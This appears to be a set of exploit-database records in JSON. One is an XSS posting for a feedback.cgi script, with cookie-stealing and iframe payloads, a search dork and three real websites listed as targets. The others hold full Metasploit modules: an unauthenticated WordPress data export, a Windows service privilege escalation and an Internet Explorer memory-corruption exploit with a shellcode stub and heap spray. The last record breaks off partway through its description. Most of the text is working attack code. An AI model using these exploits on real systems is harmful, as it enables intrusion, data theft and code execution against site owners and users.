{"published": "2012-04-10T00:00:00", "id": "1337DAY-ID-18038", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-20T02:03:41", "bulletin": {"published": "2012-04-10T00:00:00", "id": "1337DAY-ID-18038", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 3.5, "modified": "2016-04-20T02:03:41"}}, "hash": "4d8b2ce800f2ab514607e3002795f97a0e8ace7995473c1a7ea98fd373489dbf", "description": "Exploit for php platform in category web applications", "type": "zdt", "lastseen": "2016-04-20T02:03:41", "edition": 1, "title": "FeedBack Form [feedback.cgi] <= XSS Vulnerability", "href": "http://0day.today/exploit/description/18038", "modified": "2012-04-10T00:00:00", "bulletinFamily": "exploit", "viewCount": 0, "cvelist": [], "sourceHref": "http://0day.today/exploit/18038", "references": [], "reporter": "Ryuzaki Lawlet", "sourceData": "##################################################\r\n# Exploit Title: FeedBack Form [feedback.cgi] <= XSS Vulnerability\r\n# Date: 10/04/2012\r\n# Author: Ryuzaki Lawlet\r\n# Web/Blog: http://justryuz.blogspot.com\r\n# Category: webapps\r\n# Tested on: Linux\r\n# Security:RISK: High\r\n# Google dork: inurl:/cgi-bin/feedback.cgi\r\n##################################################\r\n[~]Exploit/p0c :\r\n\r\nhttp://localhost:80/cgi-bin/feedback.cgi?[webapps]=[xss]\r\n\r\n[~]Proof of Concept:\r\n\r\n1.1\r\nhe issue can be exploited by an insert on the Created Object function with script code as value.\r\nThe result is the persistent execution out of the web application context.\r\n\r\nStrings: >\"<<iframe src=http://xxxxx.com/>3</iframe> OR >\"<script>alert(document.cookie)</script>\r\n\r\n\r\n[~]Dem0 :\r\n\r\nhttp://scully.cfa.harvard.edu/cgi-bin/feedback.cgi?U=[xss]\r\nhttp://www.europcar.bg/cgi-bin/feedback.cgi?LANG=[xss]\r\nhttp://www.europcarug.com/cgi-bin/feedback.cgi?LANG=[xss]\r\n\r\nFB : www.fb.me/justryuz\r\n+---------------------------------------------------+\r\n Greetz to :\r\n[ CyberSEC,Newbie3vilc063s,Rileks Crew,h3x4 Crew,C4,T3D Hackers,]\r\n[ Antuwebhunter = Sbkiller CyberSEC = Misa CyberSEC = Ben CyberSEC = Xay CyberSEC = LoneLy CyberSEC = b0ogle ]\r\n[ And all my Freinds + Malaysian + Indonesia + Gaza & Turki ]\r\n-----------------------------------------------------+\r\n\r\nCyberSEC \u00a9 2012 All rights reserved.\r\n\r\n\n\n# 0day.today [2016-04-20] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "63a139ee8aed24ef05db1d4f4881098c", "key": "reporter"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "fd11fa876fd89ec058dd024225397ad0", "key": "title"}, {"hash": "c33edea4bdcb9e1792acd2ed92a4bd1b", "key": "sourceData"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "54f4c62b9978e320570d3441d5b36ce9", "key": "sourceHref"}, {"hash": "5a3da6b4e7187db53139dc0b8f6a1985", "key": "modified"}, {"hash": "5a3da6b4e7187db53139dc0b8f6a1985", "key": "published"}, {"hash": "a9b07c609f1f2f95050c13791b4e79fa", "key": "href"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}], "objectVersion": "1.0"}}], "description": "Exploit for php platform in category web applications", "hash": "a578173db76fe46a73c37747a8ac7eee12225c640427d93047291382ea8060b9", "enchantments": {"score": {"value": 0.1, "vector": "NONE", "modified": "2018-01-09T13:33:01"}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:18038", "SECURITYVULNS:VULN:8172"]}], "modified": "2018-01-09T13:33:01"}, "vulnersScore": 0.1}, "type": "zdt", "lastseen": "2018-01-09T13:33:01", "edition": 2, "title": "FeedBack Form [feedback.cgi] <= XSS Vulnerability", "href": "https://0day.today/exploit/description/18038", "modified": "2012-04-10T00:00:00", "bulletinFamily": "exploit", "viewCount": 2, "cvelist": [], "sourceHref": "https://0day.today/exploit/18038", "references": [], "reporter": "Ryuzaki Lawlet", "sourceData": "##################################################\r\n# Exploit Title: FeedBack Form [feedback.cgi] <= XSS Vulnerability\r\n# Date: 10/04/2012\r\n# Author: Ryuzaki Lawlet\r\n# Web/Blog: http://justryuz.blogspot.com\r\n# Category: webapps\r\n# Tested on: Linux\r\n# Security:RISK: High\r\n# Google dork: inurl:/cgi-bin/feedback.cgi\r\n##################################################\r\n[~]Exploit/p0c :\r\n\r\nhttp://localhost:80/cgi-bin/feedback.cgi?[webapps]=[xss]\r\n\r\n[~]Proof of Concept:\r\n\r\n1.1\r\nhe issue can be exploited by an insert on the Created Object function with script code as value.\r\nThe result is the persistent execution out of the web application context.\r\n\r\nStrings: >\"<<iframe src=http://xxxxx.com/>3</iframe> OR >\"<script>alert(document.cookie)</script>\r\n\r\n\r\n[~]Dem0 :\r\n\r\nhttp://scully.cfa.harvard.edu/cgi-bin/feedback.cgi?U=[xss]\r\nhttp://www.europcar.bg/cgi-bin/feedback.cgi?LANG=[xss]\r\nhttp://www.europcarug.com/cgi-bin/feedback.cgi?LANG=[xss]\r\n\r\nFB : www.fb.me/justryuz\r\n+---------------------------------------------------+\r\n Greetz to :\r\n[ CyberSEC,Newbie3vilc063s,Rileks Crew,h3x4 Crew,C4,T3D Hackers,]\r\n[ Antuwebhunter = Sbkiller CyberSEC = Misa CyberSEC = Ben CyberSEC = Xay CyberSEC = LoneLy CyberSEC = b0ogle ]\r\n[ And all my Freinds + Malaysian + Indonesia + Gaza & Turki ]\r\n-----------------------------------------------------+\r\n\r\nCyberSEC \u00a9 2012 All rights reserved.\r\n\r\n\n\n# 0day.today [2018-01-09] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "8a1b9d67edd161eba6df1d6d4a1ba4bc", "key": "description"}, {"hash": "405e0976a8c5e66df44da304e682f259", "key": "href"}, {"hash": "5a3da6b4e7187db53139dc0b8f6a1985", "key": "modified"}, {"hash": "5a3da6b4e7187db53139dc0b8f6a1985", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "63a139ee8aed24ef05db1d4f4881098c", "key": "reporter"}, {"hash": "c25b30bcd1c629aa67b6f8f86c415d01", "key": "sourceData"}, {"hash": "8f4865cf55b21027eb68a1658249bacb", "key": "sourceHref"}, {"hash": "fd11fa876fd89ec058dd024225397ad0", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}
{"metasploit": [{"lastseen": "2019-12-15T19:54:41", "bulletinFamily": "exploit", "description": "This module allows you to export Wordpress data (such as the database, plugins, themes, uploaded files, etc) via the All-in-One Migration plugin without authentication.\n", "modified": "2018-10-01T17:59:09", "published": "2015-07-20T17:13:32", "id": "MSF:AUXILIARY/GATHER/WP_ALL_IN_ONE_MIGRATION_EXPORT", "href": "", "type": "metasploit", "title": "WordPress All-in-One Migration Export", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HTTP::Wordpress\n include Msf::Auxiliary::Report\n\n def initialize(info = {})\n super(update_info(\n info,\n 'Name' => 'WordPress All-in-One Migration Export',\n 'Description' => %q{\n This module allows you to export Wordpress data (such as the database, plugins, themes,\n uploaded files, etc) via the All-in-One Migration plugin without authentication.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'James Golovich', # Disclosure\n 'rastating' # Metasploit module\n ],\n 'References' =>\n [\n ['WPVDB', '7857'],\n ['URL', 'http://www.pritect.net/blog/all-in-one-wp-migration-2-0-4-security-vulnerability']\n ],\n 'DisclosureDate' => 'Mar 19 2015'\n ))\n\n register_options(\n [\n OptInt.new('MAXTIME', [ true, 'The maximum number of seconds to wait for the export to complete', 300 ])\n ])\n end\n\n def check\n check_plugin_version_from_readme('all-in-one-wp-migration', '2.0.5')\n end\n\n def run\n print_status(\"Requesting website export...\")\n res = send_request_cgi(\n {\n 'method' => 'POST',\n 'uri' => wordpress_url_admin_ajax,\n 'vars_get' => { 'action' => 'router' },\n 'vars_post' => { 'options[action]' => 'export' }\n }, datastore['MAXTIME'])\n\n unless res\n fail_with(Failure::Unknown, \"#{peer} - No response from the target\")\n end\n\n if res.code != 200\n fail_with(Failure::UnexpectedReply, \"#{peer} - Server responded with status code #{res.code}\")\n end\n\n if res.body.blank?\n print_status(\"Unable to download anything.\")\n print_status(\"Either the target isn't actually vulnerable, or\")\n print_status(\"it does not allow WRITE permission to the all-in-one-wp-migration/storage directory.\")\n else\n store_path = store_loot('wordpress.export', 'zip', datastore['RHOST'], res.body, 'wordpress_backup.zip', 'WordPress Database and Content Backup')\n print_good(\"Backup archive saved to #{store_path}\")\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/gather/wp_all_in_one_migration_export.rb"}, {"lastseen": "2019-12-04T09:44:54", "bulletinFamily": "exploit", "description": "This module attempts to exploit existing administrative privileges to obtain a SYSTEM session. If directly creating a service fails, this module will inspect existing services to look for insecure file or configuration permissions that may be hijacked. It will then attempt to restart the replaced service to run the payload. This will result in a new session when this succeeds.\n", "modified": "2017-07-24T13:26:21", "published": "2012-10-12T02:42:36", "id": "MSF:EXPLOIT/WINDOWS/LOCAL/SERVICE_PERMISSIONS", "href": "", "type": "metasploit", "title": "Windows Escalate Service Permissions Local Privilege Escalation", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Local\n Rank = GreatRanking\n\n include Msf::Post::File\n include Msf::Post::Windows::Services\n include Msf::Post::Windows::Accounts\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n ERROR = Msf::Post::Windows::Error\n\n def initialize(info={})\n super( update_info( info,\n 'Name' => 'Windows Escalate Service Permissions Local Privilege Escalation',\n 'Description' => %q{\n This module attempts to exploit existing administrative privileges to obtain\n a SYSTEM session. If directly creating a service fails, this module will inspect\n existing services to look for insecure file or configuration permissions that may\n be hijacked. It will then attempt to restart the replaced service to run the\n payload. This will result in a new session when this succeeds.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'scriptjunkie' ],\n 'Arch' => [ ARCH_X86, ARCH_X64 ],\n 'Platform' => [ 'win' ],\n 'SessionTypes' => [ 'meterpreter' ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n 'WfsDelay' => '5'\n },\n 'Targets' =>\n [\n [ 'Automatic', { } ],\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate'=> \"Oct 15 2012\"\n ))\n\n register_options([\n OptBool.new(\"AGGRESSIVE\", [ false, \"Exploit as many services as possible (dangerous)\", false ])\n ])\n\n end\n\n def execute_payload_as_new_service(path)\n success = false\n\n print_status(\"Trying to add a new service...\")\n service_name = Rex::Text.rand_text_alpha((rand(8)+6))\n if service_create(service_name, {:path => path, :display=>\"\"}) == ERROR::SUCCESS\n print_status(\"Created service... #{service_name}\")\n write_exe(path, service_name)\n if service_start(service_name) == ERROR::SUCCESS\n print_good(\"Service should be started! Enjoy your new SYSTEM meterpreter session.\")\n success = true\n end\n\n service_delete(service_name)\n else\n print_status(\"No privs to create a service...\")\n success = false\n end\n\n return success\n end\n\n def weak_service_permissions(service_name, service, path)\n success = false\n vprint_status(\"[#{service_name}] Checking for weak service permissions\")\n\n if (service_change_config(service_name, {:path => path}) == ERROR::SUCCESS)\n print_good(\"[#{service_name}] has weak configuration permissions - reconfigured to use exe #{path}\")\n print_status(\"[#{service_name}] Restarting service\")\n res = service_stop(service_name)\n\n if ((res == ERROR::SUCCESS) || (res == ERROR::SERVICE_NOT_ACTIVE))\n write_exe(path, service_name)\n if service_restart(service_name)\n print_good(\"[#{service_name}] Service restarted\")\n success = true\n else\n print_error(\"[#{service_name}] Unable to restart service\")\n end\n end\n\n unless (service_change_config(service_name, {:path => service[:path]}) == ERROR::SUCCESS)\n print_error(\"[#{service_name}] Failed to reset service to original path #{service[:path]}\")\n end\n end\n\n return success\n end\n\n def weak_file_permissions(service_name, service, path, token)\n success = false\n vprint_status(\"[#{service_name}] Checking for weak file permissions\")\n\n #get path to exe; parse out quotes and arguments\n original_path = service[:path]\n possible_path = expand_path(original_path)\n if (possible_path[0] == '\"')\n possible_path = possible_path.split('\"')[1]\n else\n possible_path = possible_path.split(' ')[0]\n end\n\n unless file?(possible_path)\n # If we cant determine it manually show the user and let them decide if manual inspection is worthwhile\n print_status(\"[#{service_name}] Cannot reliably determine path: #{service[:path]}\")\n end\n\n file_permissions = check_dir_perms(possible_path, token)\n\n if file_permissions && file_permissions.index('W')\n print_good(\"[#{service_name}] Write access to #{possible_path}\")\n\n begin\n status = service_status(service_name)\n no_access = false\n # Unless service is already stopped\n if status[:state] == SERVICE_STOPPED\n stopped = true\n else\n res = service_stop(service_name)\n stopped = ((res == ERROR::SUCCESS) || (res == ERROR::SERVICE_NOT_ACTIVE))\n end\n rescue RuntimeError => e\n vprint_error(\"[#{service_name}] #{e} \")\n no_access = true\n end\n\n if stopped or no_access\n begin\n if move_file(possible_path, possible_path+'.bak')\n write_exe(possible_path, service_name)\n print_status(\"[#{service_name}] #{possible_path} moved to #{possible_path+'.bak'} and replaced.\")\n if service_restart(service_name)\n print_good(\"[#{service_name}] Service restarted\")\n success = true\n else\n print_error(\"Unable to restart service\")\n end\n end\n rescue Rex::Post::Meterpreter::RequestError => e\n vprint_error(\"[#{service_name}] #{e}\")\n end\n else\n vprint_error(\"[#{service_name}] Unable to stop service\")\n end\n end\n\n return success\n end\n\n # If ServiceType is SERVICE_WIN32_SHARE_PROCESS then we need to\n # define the correct servicename.\n def write_exe(path, service_name=nil)\n vprint_status(\"[#{service_name}] Writing service executable to #{path}\")\n exe = generate_payload_exe_service({servicename: service_name, arch: get_payload_arch})\n write_file(path, exe)\n register_files_for_cleanup(path)\n end\n\n def get_payload_arch\n if payload.arch.include?(ARCH_X64)\n return ARCH_X64\n else\n return ARCH_X86\n end\n end\n\n def exploit\n filename = Rex::Text.rand_text_alpha((rand(8)+6)) + \".exe\"\n tempexe_name = Rex::Text.rand_text_alpha((rand(8)+6)) + \".exe\"\n\n dir_env = get_envs('SystemRoot', 'TEMP')\n sysdir = dir_env['SystemRoot']\n tmpdir = dir_env['TEMP']\n tempexe = tmpdir + \"\\\\\" + tempexe_name\n\n begin\n return if execute_payload_as_new_service(tempexe)\n rescue RuntimeError => e\n vprint_status(\"Unable to create a new service: #{e}\")\n end\n\n aggressive = datastore['AGGRESSIVE']\n\n print_status(\"Trying to find weak permissions in existing services..\")\n\n token = get_imperstoken\n each_service do |serv|\n service_name = serv[:name]\n service = service_info(service_name)\n begin\n return if weak_file_permissions(service_name, service, tempexe, token) and not aggressive\n return if weak_service_permissions(service_name, service, tempexe) and not aggressive\n rescue RuntimeError => e\n vprint_status(\"[#{serv[:name]}] #{e}\")\n end\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/local/service_permissions.rb"}, {"lastseen": "2019-11-20T21:02:28", "bulletinFamily": "exploit", "description": "This module exploits a vulnerability in the data binding feature of Internet Explorer. In order to execute code reliably, this module uses the .NET DLL memory technique pioneered by Alexander Sotirov and Mark Dowd. This method is used to create a fake vtable at a known location with all methods pointing to our payload. Since the .text segment of the .NET DLL is non-writable, a prefixed code stub is used to copy the payload into a new memory segment and continue execution from there.\n", "modified": "2019-05-23T12:01:21", "published": "2010-02-10T20:41:07", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/MS08_078_XML_CORRUPTION", "href": "", "type": "metasploit", "title": "MS08-078 Microsoft Internet Explorer Data Binding Memory Corruption", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n #\n # Superceded by ms10_018_ie_behaviors, disable for BrowserAutopwn\n #\n #include Msf::Exploit::Remote::BrowserAutopwn\n #autopwn_info({\n #\t:ua_name => HttpClients::IE,\n #\t:ua_minver => \"7.0\",\n #\t:ua_maxver => \"7.0\",\n #\t:javascript => true,\n #\t:os_name => OperatingSystems::Match::WINDOWS,\n #\t:vuln_test => nil, # no way to test without just trying it\n #})\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MS08-078 Microsoft Internet Explorer Data Binding Memory Corruption',\n 'Description' => %q{\n This module exploits a vulnerability in the data binding feature of Internet\n Explorer. In order to execute code reliably, this module uses the .NET DLL\n memory technique pioneered by Alexander Sotirov and Mark Dowd. This method is\n used to create a fake vtable at a known location with all methods pointing\n to our payload. Since the .text segment of the .NET DLL is non-writable, a\n prefixed code stub is used to copy the payload into a new memory segment and\n continue execution from there.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'hdm'\n ],\n 'References' =>\n [\n ['CVE', '2008-4844'],\n ['OSVDB', '50622'],\n ['BID', '32721'],\n ['MSB', 'MS08-078'],\n ['URL', 'https://web.archive.org/web/20080913064223/http://taossa.com/archive/bh08sotirovdowd.pdf'],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 1000,\n 'BadChars' => \"\\x00\",\n 'Compat' =>\n {\n 'ConnectionType' => '-find',\n },\n 'StackAdjustment' => -3500,\n\n # Temporary stub virtualalloc() + memcpy() payload to RWX page\n 'PrependEncoder' =>\n \"\\xe8\\x56\\x00\\x00\\x00\\x53\\x55\\x56\\x57\\x8b\\x6c\\x24\\x18\\x8b\\x45\\x3c\"+\n \"\\x8b\\x54\\x05\\x78\\x01\\xea\\x8b\\x4a\\x18\\x8b\\x5a\\x20\\x01\\xeb\\xe3\\x32\"+\n \"\\x49\\x8b\\x34\\x8b\\x01\\xee\\x31\\xff\\xfc\\x31\\xc0\\xac\\x38\\xe0\\x74\\x07\"+\n \"\\xc1\\xcf\\x0d\\x01\\xc7\\xeb\\xf2\\x3b\\x7c\\x24\\x14\\x75\\xe1\\x8b\\x5a\\x24\"+\n \"\\x01\\xeb\\x66\\x8b\\x0c\\x4b\\x8b\\x5a\\x1c\\x01\\xeb\\x8b\\x04\\x8b\\x01\\xe8\"+\n \"\\xeb\\x02\\x31\\xc0\\x5f\\x5e\\x5d\\x5b\\xc2\\x08\\x00\\x5e\\x6a\\x30\\x59\\x64\"+\n \"\\x8b\\x19\\x8b\\x5b\\x0c\\x8b\\x5b\\x1c\\x8b\\x1b\\x8b\\x5b\\x08\\x53\\x68\\x54\"+\n \"\\xca\\xaf\\x91\\xff\\xd6\\x6a\\x40\\x5e\\x56\\xc1\\xe6\\x06\\x56\\xc1\\xe6\\x08\"+\n \"\\x56\\x6a\\x00\\xff\\xd0\\x89\\xc3\\xeb\\x0d\\x5e\\x89\\xdf\\xb9\\xe8\\x03\\x00\"+\n \"\\x00\\xfc\\xf3\\xa4\\xff\\xe3\\xe8\\xee\\xff\\xff\\xff\"\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', { }],\n ],\n 'DisclosureDate' => 'Dec 07 2008',\n 'DefaultTarget' => 0))\n end\n\n def on_request_uri(cli, request)\n @state ||= {}\n\n ibase = 0x13370000\n vaddr = ibase + 0x2065\n\n uri,token = request.uri.split('?', 2)\n\n\n if(token)\n token,trash = token.split('=')\n end\n\n if !(token and @state[token])\n\n print_status(\"Sending #{self.name} init HTML\")\n token = rand_text_numeric(32)\n if (\"/\" == get_resource[-1,1])\n dll_uri = get_resource[0, get_resource.length - 1]\n else\n dll_uri = get_resource\n end\n dll_uri << \"/generic-\" + Time.now.to_i.to_s + \".dll\"\n\n html = <<-EOS\n<html>\n<head>\n<script language=\"javascript\">\n function forward() {\n window.location = window.location + '?#{token}';\n }\n\n function start() {\n setTimeout(\"forward()\", 2000);\n }\n</script>\n</head>\n<body onload=\"start()\">\n <object classid=\"#{dll_uri}?#{token}#GenericControl\">\n <object>\n</body>\n</html>\nEOS\n @state[token] = :start\n # Transmit the compressed response to the client\n send_response(cli, html, { 'Content-Type' => 'text/html' })\n return\n end\n\n if (uri.match(/\\.dll/i))\n\n print_status(\"Sending DLL\")\n\n return if ((p = regenerate_payload(cli)) == nil)\n\n # First entry points to the table of pointers\n vtable = [ vaddr + 4 ].pack(\"V\")\n cbase = ibase + 0x2065 + (256 * 4)\n\n # Build a function table\n 255.times { vtable << [cbase].pack(\"V\") }\n\n # Append the shellcode\n vtable << p.encoded\n send_response(\n cli,\n Msf::Util::EXE.to_dotnetmem(ibase, vtable),\n {\n 'Content-Type' => 'application/x-msdownload',\n 'Connection' => 'close',\n 'Pragma' => 'no-cache'\n }\n )\n @state[token] = :dll\n return\n end\n\n\n\n html = \"\"\n data = \"==gPOFEUT9CPK4DVYVEV9MVQUFUTS9kRBRVQEByQ9QETGFEVBREIJNSPDJ1UBRVQ\" +\n \"EBiTBB1U8ogPM1EVI1zUBRVQNJ1TGFEVBREID1DRMZUQUFERgk0I9MkUTFEVBREI\" +\n \"OFEUTxjC+QFWFRVPTFEVB1kUPZUQUFERgMUPExkRBRVQEBSSj0zQSNVQUFERg4UQ\" +\n \"QNFPK4DTNRFS9MVQUFUTS9kRBRVQEByQ9QETGFEVBREIJNSPDJ1UBRVQEBiTBB1U\" +\n \"8ogPM1EWvwjPJ1DRJBCTNhFPK4DTNRFS9MVQUFUTS9kRBRVQEByQ9QETGFEVBREI\" +\n \"JNSPDJ1UBRVQEBiVJREP\"\n data = data.reverse.unpack(\"m*\")[0]\n\n\n #\n # .NET DLL MODE\n #\n if(@state[token] == :dll)\n print_status(\"Sending exploit HTML (Using .NET DLL)\")\n\n addr_a,addr_b = [vaddr].pack(\"V\").unpack(\"v*\").map{|v| \"&##{v};\" }\n bxml = Rex::Text.to_hex(%Q|\n<XML ID=I>\n <X>\n <C>\n <![CDATA[\n <image\n SRC=\\\\\\\\#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}.X\n SRC=\\\\\\\\#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}.X\n SRC=\\\\\\\\#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}.X\n SRC=\\\\\\\\#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}.X\n SRC=\\\\\\\\#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}.X\n SRC=\\\\\\\\#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}.X\n SRC=\\\\\\\\#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}.X\n SRC=\\\\\\\\#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}.X\n SRC=\\\\\\\\#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}.X\n SRC=\\\\\\\\#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}.X\n SRC=\\\\\\\\#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}.X\n >\n ]]>\n </C>\n </X>\n</XML>\n\n#{data}\n\n<script>\n setTimeout('window.location.reload(true);', 250);\n</script>\n |, '%')\n\n var_unescape = rand_text_alpha(rand(100) + 1)\n var_start = rand_text_alpha(rand(100) + 1)\n\n html = %Q|<html>\n<head>\n<script>\n function #{var_start}() {\n var #{var_unescape} = unescape;\n document.write(#{var_unescape}('#{bxml}'));\n }\n</script>\n</head>\n<body onload=\"#{var_start}()\">\n</body>\n</html>\n |\n\n #\n # HEAP SPRAY MODE\n #\n else\n print_status(\"Sending exploit HTML (Using Heap Spray)\")\n\n addr_a,addr_b = [0x0c0c0c0c].pack(\"V\").unpack(\"v*\").map{|v| \"&##{v};\" }\n bxml = Rex::Text.to_hex(%Q|\n<XML ID=I>\n <X>\n <C>\n <![CDATA[\n <image\n SRC=\\\\\\\\#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}.X\n SRC=\\\\\\\\#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}#{addr_a}#{addr_b}.X\n >\n ]]>\n </C>\n </X>\n</XML>\n\n#{data}\n\n<script>\n setTimeout('window.location.reload(true);', 1000);\n</script>\n |, '%')\n\n var_memory = rand_text_alpha(rand(100) + 1)\n var_boom = rand_text_alpha(rand(100) + 1)\n var_body = rand_text_alpha(rand(100) + 1)\n var_unescape = rand_text_alpha(rand(100) + 1)\n var_shellcode = rand_text_alpha(rand(100) + 1)\n var_spray = rand_text_alpha(rand(100) + 1)\n var_start = rand_text_alpha(rand(100) + 1)\n var_i = rand_text_alpha(rand(100) + 1)\n\n rand_html = rand_text_english(rand(400) + 500)\n\n html = <<-EOS\n<html>\n<head>\n<script>\n var #{var_memory} = new Array();\n var #{var_unescape} = unescape;\n\n\n function #{var_boom}() {\n document.getElementById('#{var_body}').innerHTML = #{var_unescape}('#{bxml}');\n }\n\n function #{var_start}() {\n\n var #{var_shellcode} = #{var_unescape}( '#{Rex::Text.to_unescape(regenerate_payload(cli).encoded)}');\n\n var #{var_spray} = #{var_unescape}( \"%\" + \"u\" + \"0\" + \"c\" + \"0\" + \"c\" + \"%u\" + \"0\" + \"c\" + \"0\" + \"c\" );\n\n do { #{var_spray} += #{var_spray} } while( #{var_spray}.length < 0xd0000 );\n\n for(#{var_i} = 0; #{var_i} < 100; #{var_i}++) #{var_memory}[#{var_i}] = #{var_spray} + #{var_shellcode};\n\n setTimeout('#{var_boom}()', 1000);\n }\n</script>\n</head>\n<body onload=\"#{var_start}()\" id=\"#{var_body}\">\n#{rand_html}\n</body>\n</html>\nEOS\n\n end\n\n # Transmit the compressed response to the client\n send_response(cli, html, { 'Content-Type' => 'text/html', 'Pragma' => 'no-cache' })\n\n # Handle the payload\n handler(cli)\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/ms08_078_xml_corruption.rb"}, {"lastseen": "2019-11-29T11:18:31", "bulletinFamily": "exploit", "description": "A heap-based buffer overflow can occur when calling the undocumented \"sp_replwritetovarbin\" extended stored procedure. This vulnerability affects all versions of Microsoft SQL Server 2000 and 2005, Windows Internal Database, and Microsoft Desktop Engine (MSDE) without the updates supplied in MS09-004. Microsoft patched this vulnerability in SP3 for 2005 without any public mention. An authenticated database session is required to access the vulnerable code. That said, it is possible to access the vulnerable code via an SQL injection vulnerability. This exploit smashes several pointers, as shown below. 1\\. pointer to a 32-bit value that is set to 0 2\\. pointer to a 32-bit value that is set to a length influenced by the buffer length. 3\\. pointer to a 32-bit value that is used as a vtable pointer. In MSSQL 2000, this value is referenced with a displacement of 0x38. For MSSQL 2005, the displacement is 0x10. The address of our buffer is conveniently stored in ecx when this instruction is executed. 4\\. On MSSQL 2005, an additional vtable ptr is smashed, which is referenced with a displacement of 4. This pointer is not used by this exploit. This particular exploit replaces the previous dual-method exploit. It uses a technique where the value contained in ecx becomes the stack. From there, return oriented programming is used to normalize the execution state and finally execute the payload via a \"jmp esp\". All addresses used were found within the sqlservr.exe memory space, yielding very reliable code execution using only a single query. NOTE: The MSSQL server service does not automatically restart by default. That said, some exceptions are caught and will not result in terminating the process. If the exploit crashes the service prior to hijacking the stack, it won't die. Otherwise, it's a goner.\n", "modified": "2017-09-14T02:03:34", "published": "2009-12-31T16:26:32", "id": "MSF:EXPLOIT/WINDOWS/MSSQL/MS09_004_SP_REPLWRITETOVARBIN", "href": "", "type": "metasploit", "title": "MS09-004 Microsoft SQL Server sp_replwritetovarbin Memory Corruption", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::MSSQL\n\n def initialize(info = {})\n\n super(update_info(info,\n 'Name' => 'MS09-004 Microsoft SQL Server sp_replwritetovarbin Memory Corruption',\n 'Description' => %q{\n A heap-based buffer overflow can occur when calling the undocumented\n \"sp_replwritetovarbin\" extended stored procedure. This vulnerability affects\n all versions of Microsoft 